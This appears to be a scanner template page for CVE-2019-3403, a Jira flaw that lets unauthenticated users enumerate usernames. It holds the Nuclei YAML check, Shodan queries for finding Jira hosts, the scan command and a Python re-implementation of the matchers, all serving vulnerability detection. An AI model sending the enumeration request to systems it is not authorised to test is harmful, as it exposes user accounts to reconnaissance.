Jira - Incorrect Authorization
ID: CVE-2019-3403
Severity: medium
Author: Ganofins
Tags: cve,cve2019,atlassian,jira,enumeration
Description
Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 is susceptible to an incorrect authorization check in the /rest/api/2/user/picker REST resource, enabling an unauthenticated attacker to enumerate usernames and gain improper access.
YAML Source

```yaml
id: CVE-2019-3403

info:
  name: Jira - Incorrect Authorization
  author: Ganofins
  severity: medium
  description: Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 is susceptible to an incorrect authorization check in the /rest/api/2/user/picker rest resource, enabling an attacker to enumerate usernames and gain improper access.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive data, potential data breaches, and unauthorized actions within the Jira system.
  remediation: |
    Apply the latest security patches and updates provided by Atlassian to fix the vulnerability and ensure proper authorization controls are in place.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-69242
    - https://nvd.nist.gov/vuln/detail/CVE-2019-3403
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/rezasarvani/JiraVulChecker
    - https://github.com/und3sc0n0c1d0/UserEnumJira
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-3403
    cwe-id: CWE-863
    epss-score: 0.00379
    epss-percentile: 0.72862
    cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: jira
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
      - http.component:"atlassian confluence"
      - cpe:"cpe:2.3:a:atlassian:jira"
  tags: cve,cve2019,atlassian,jira,enumeration

http:
  - method: GET
    path:
      - "{{BaseURL}}/rest/api/2/user/picker?query="

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "application/json")'
          - 'contains_any(body, "\"users\":","\"usuario\":")'
          - 'contains_all(body, "\"total\":", "\"header\":")'
          - 'status_code == 200 || status_code == 404'
        condition: and

      - type: word
        part: body
        words:
          - 'total":0'
        negative: true
# digest: 4b0a00483046022100dd679e418f1f94d6507ad4f9274a3bad7d315205ed1dcdfc44065f015111dcf5022100dea05614d912bda96ed97ef2aefc3d610580a7474b11ee8fe55a459cd8a5105c:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is run with the Nuclei scanner to check a Jira instance for the unauthenticated user-picker response described above. Point Nuclei at the base URL of the target Jira and pass the template path:
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-3403.yaml"
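To make the template's detection logic concrete, the following added example (not part of the Nuclei template or of this page) re-implements both matchers in Python and evaluates them against three constructed responses shaped like the user-picker endpoint's output. The response dictionaries, the `Content-Type` values and the user names in them are made up for illustration; only the matcher rules come from the template above.

```python
import json

# Constructed sample responses (not captured from any real Jira instance) that
# mimic the JSON shape of /rest/api/2/user/picker. Jira emits compact JSON, so
# the bodies are serialised without spaces to match the template's needles.
COMPACT = (",", ":")

VULNERABLE_RESPONSE = {
    "status_code": 200,
    "headers": {"Content-Type": "application/json;charset=UTF-8"},
    "body": json.dumps(
        {
            "users": [{"name": "admin", "key": "admin", "displayName": "Administrator"}],
            "total": 1,
            "header": "Showing 1 of 1 matching users",
        },
        separators=COMPACT,
    ),
}

# Endpoint answers, but with an empty result set: the negative matcher applies.
EMPTY_RESPONSE = {
    "status_code": 200,
    "headers": {"Content-Type": "application/json;charset=UTF-8"},
    "body": json.dumps(
        {"users": [], "total": 0, "header": "Showing 0 of 0 matching users"},
        separators=COMPACT,
    ),
}

# Endpoint enforces authentication and returns an HTML error page.
UNAUTHORIZED_RESPONSE = {
    "status_code": 401,
    "headers": {"Content-Type": "text/html;charset=UTF-8"},
    "body": "<html><body>Unauthorized</body></html>",
}


def dsl_matcher(response: dict) -> bool:
    """The template's `type: dsl` matcher with `condition: and`."""
    # Nuclei's `header` variable is the raw response header block; a
    # "Name: value" rendering is enough for a substring check.
    header_blob = "\n".join(f"{k}: {v}" for k, v in response["headers"].items())
    body = response["body"]
    status = response["status_code"]
    return all(
        [
            "application/json" in header_blob,                       # contains(header, ...)
            any(n in body for n in ('"users":', '"usuario":')),      # contains_any(body, ...)
            all(n in body for n in ('"total":', '"header":')),       # contains_all(body, ...)
            status in (200, 404),                                    # status_code == 200 || 404
        ]
    )


def negative_word_matcher(response: dict) -> bool:
    """The template's `type: word` matcher with `negative: true`.

    It passes only when the body does NOT contain 'total":0', i.e. an
    empty user list is deliberately not reported as a finding.
    """
    return 'total":0' not in response["body"]


def template_matches(response: dict) -> bool:
    """`matchers-condition: and`: both matchers must pass to report a hit."""
    return dsl_matcher(response) and negative_word_matcher(response)


if __name__ == "__main__":
    for label, resp in [
        ("vulnerable", VULNERABLE_RESPONSE),
        ("empty", EMPTY_RESPONSE),
        ("unauthorized", UNAUTHORIZED_RESPONSE),
    ]:
        print(f"{label:>12}: {'MATCH' if template_matches(resp) else 'no match'}")
```

The `negative: true` word matcher is the part worth noticing when interpreting scan results: a response containing `"total":0` is never reported, so a clean Nuclei run only tells you that the unauthenticated query returned no users, not that the endpoint enforces authorization. Confirm the fix by checking the installed Jira version against the ranges in the description and by verifying that an unauthenticated request to the resource is rejected, rather than relying on the absence of a match alone.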